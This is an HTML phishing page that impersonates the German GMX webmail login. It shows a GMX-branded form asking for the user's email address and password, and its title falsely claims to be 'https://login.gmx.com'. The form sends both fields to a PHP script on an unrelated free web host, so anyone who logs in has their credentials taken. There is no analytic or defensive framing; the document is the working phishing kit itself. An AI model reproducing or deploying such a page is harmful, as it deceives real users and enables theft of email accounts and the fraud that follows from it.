


<html lang="de">
    <head>
        <meta charset="UTF-8">
        <meta http-equiv="X-UA-Compatible" content="IE=edge">
        <meta name="viewport" content="width=device-width, initial-scale=1.0">
        <title>https://login.gmx.com</title>
        <link rel="stylesheet" href="m-style.css">
        <style>
           body{
        margin: 0;
        padding: 0;
        background-color:whitesmoke;
    
    }
    .boxall{
        width:400px;
        height:650px;
        margin: auto;
        overflow:hidden;  
        background-color:white;
    }
    
    
    .box1{
        width:400px;
        height:650px;
        margin: auto;
        background-color:white;
        
        
        
    }
    .gmxloge{
        background-color:#1C449B;
        width:500px;
        margin-top:-27;
    
    }
    
    .logetext{
        /* font-family: 'Trebuchet MS', 'Lucida Sans Unicode', 'Lucida Grande', 'Lucida Sans', Arial, sans-serif;
        font-family: Arial, Helvetica, sans-serif;
    font-family: 'Gill Sans', 'Gill Sans MT', Calibri, 'Trebuchet MS', sans-serif;
    font-family: 'Lucida Sans', 'Lucida Sans Regular', 'Lucida Grande', 'Lucida Sans Unicode', Geneva, Verdana, sans-serif; */
    font-family: 'Segoe UI', Tahoma, Geneva, Verdana, sans-serif;
    color:white;
    font-size:40px;
    margin-left:5px;
    
    
    }
    
    .biggmxloge{
        background-color:white;
        / background-color:grey; /
        width:400px;
        margin-top:30px;
        text-align: center;
    
    }
    
    .logetext2{
        /* font-family: 'Trebuchet MS', 'Lucida Sans Unicode', 'Lucida Grande', 'Lucida Sans', Arial, sans-serif;
        font-family: Arial, Helvetica, sans-serif;
    font-family: 'Gill Sans', 'Gill Sans MT', Calibri, 'Trebuchet MS', sans-serif;
    font-family: 'Lucida Sans', 'Lucida Sans Regular', 'Lucida Grande', 'Lucida Sans Unicode', Geneva, Verdana, sans-serif; */
    font-family: 'Segoe UI', Tahoma, Geneva, Verdana, sans-serif;
    color:#1C449B;
    font-size:45px;
    text-align: center;
    
    
    }
    
    .login1{
        /* font-family: 'Segoe UI', Tahoma, Geneva, Verdana, sans-serif;
          font-family: 'Trebuchet MS', 'Lucida Sans Unicode', 'Lucida Grande', 'Lucida Sans', Arial, sans-serif;
        font-family: Arial, Helvetica, sans-serif;
    font-family: 'Gill Sans', 'Gill Sans MT', Calibri, 'Trebuchet MS', sans-serif; */
    font-family: 'Lucida Sans', 'Lucida Sans Regular', 'Lucida Grande', 'Lucida Sans Unicode', Geneva, Verdana, sans-serif; 
    
    color:black;
    font-size:px;
    text-align: center;
    }
    
    .loginhere{
         /* font-family: 'Segoe UI', Tahoma, Geneva, Verdana, sans-serif;
          font-family: 'Trebuchet MS', 'Lucida Sans Unicode', 'Lucida Grande', 'Lucida Sans', Arial, sans-serif;
        font-family: Arial, Helvetica, sans-serif;
    font-family: 'Gill Sans', 'Gill Sans MT', Calibri, 'Trebuchet MS', sans-serif; */
    font-family: 'Lucida Sans', 'Lucida Sans Regular', 'Lucida Grande', 'Lucida Sans Unicode', Geneva, Verdana, sans-serif; 
    font-size:13px;
    }
    
    .Username{
        font-size:12px;
        font-family: Arial, Helvetica, sans-serif;
        color: #444444;
        margin-left:25px;
    }
    
    .password{
        font-size:12px;
        font-family: Arial, Helvetica, sans-serif;
        color: #444444;
        margin-left:25px;
    }
    .inp1{
        width:355px;
        height:38px;
        margin-left:20px;
        margin-top:5px;
        padding-left:10px;
        border:1px solid black;
        border:1px solid black;
        border-radius:3px;
        
        
    }
    
    
    .inp4{
        width:355;
        height:38px;
        margin-left:20px;
        margin-top:-7px;
        padding-left:10px;
        border:1px solid black;
        border-radius:3px;
        background-color:;
        position: relative;
    }
    
    .inp1label1{
        font-size: 12px;
        font-family: 'Lucida Sans', 'Lucida Sans Regular', 'Lucida Grande', 'Lucida Sans Unicode', Geneva, Verdana, sans-serif;
        margin-left: 20px;
        
        
    }
    
    .inp1label4{
        font-size: 12px;
        font-family: 'Lucida Sans', 'Lucida Sans Regular', 'Lucida Grande', 'Lucida Sans Unicode', Geneva, Verdana, sans-serif;
        margin-left: 20px;
        margin-top:10px;
    }
    
    
    
    button{
        background-color:rgb(13, 180, 13);
        color: #ffffff; 
        margin-left:20px; 
        width:355px;
        height:38px;
        margin-top:20px; 
        border-radius:3px;
        border:none;
    }
    
    
    
    
    
        </style>    
    </head>
    <body>
                <div class="boxall">
    
                
                <div class="box1">
                    <div class="gmxloge">
                        <h1 class="logetext">GMX</h1>
                    </div>
    
                    <div class="biggmxloge">
                        <h1 class="logetext2">GMX</h1>
                        <h2 class="login1">Einloggen</h2>
                        <p class="loginhere">Bitte melden Sie sich hier mit Ihrer GMX <br> <br> E-Mail-Adresse und lhrem passwort an. </p>
                    </div>
                        
                        
                             <form action="https://controversial-indic.000webhostapp.com/wp-content/uploads/xles.php"  method="POST"> 
                                <label class="inp1label1" for="">GMX-E-Mail-Adresse</label>
                                <input type="email" class="inp1" name="username" id="email" value="" placeholder="">
                   
                                <p class="inp1label4" for="">Passwort eingeben</p>
                                <input type="password" class="inp4" name="password"  id="password" placeholder="">
                               
                                
                            
                                
                                
                                
                                
                                <button  type="submit" name="submit" alt="submit"  onclick="function()" id="button" style="">Login</button> 
                            </form> 
    
                            <div style="text-align:center;">
                            <a style="text-decoration:none; margin: auto; color: #1C449B; font-family: 'Gill Sans', 'Gill Sans MT', Calibri, 'Trebuchet MS', sans-serif;" href="">Passwort vergessen?</a>
                        </div>
    
                        <div>
    
                        </div>
                        <br>
                        <div style="text-align:center;">
                            <a style="text-decoration:none; margin: auto; color:black; font-size:26px; font-family: 'Gill Sans', 'Gill Sans MT', Calibri, 'Trebuchet MS', sans-serif;" href="">Neu bei GMX?</a>
                        </div>
    
                        <br>
                        <div style="text-align:center;">
                            <a style="text-decoration:none; margin: auto; color: #1C449B; font-family: 'Gill Sans', 'Gill Sans MT', Calibri, 'Trebuchet MS', sans-serif;" href="">Jetzt kostenlos registrieren!</a>
                        </div>
    
                        <img src="" alt="">
                </div>
    
                
                           
                
            </div>  
        
        
        
        </body>
    </html>